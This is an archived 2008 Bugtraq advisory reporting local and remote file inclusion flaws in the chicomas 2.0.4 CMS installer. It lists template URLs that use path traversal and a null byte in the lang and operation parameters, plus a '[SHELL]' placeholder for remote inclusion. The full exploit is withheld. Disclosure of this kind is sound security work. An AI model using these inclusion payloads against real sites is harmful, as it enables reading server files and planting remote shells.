bug report

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: bug report
From: hadikiamarsi@xxxxxxxxxxx
Date: 27 Apr 2008 17:33:41 -0000
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm


# Author:       Hadi Kiamarsi
# Exploit By :  Hadi Kiamarsi
# Email : hadikiamarsi@xxxxxxxxxxx


# CMS:          chicomas.2.0.4
# Download CMS : 
http://garr.dl.sourceforge.net/sourceforge/chicomas/chicomas.2.0.4.zip

web site : http://ircrash.com



##############################################################################
                             File Inclusion ( Local & Remote )

# Bugs : 

#Local File Inclusion:

[chicomas]/install/?lang=../FILE%00
[chikomas]/install/?operation=../FILE%00

#Remote File Inclusion

[chicomas]/install/?lang=[SHELL]%00



#Exploit

exploit is very private

Prev by Date: Minibb 2.2a XSS Vulnerability
Next by Date: Microsoft SWI blog inaccuracies
Previous by thread: Minibb 2.2a XSS Vulnerability
Next by thread: Microsoft SWI blog inaccuracies
Index(es):
- Date
- Thread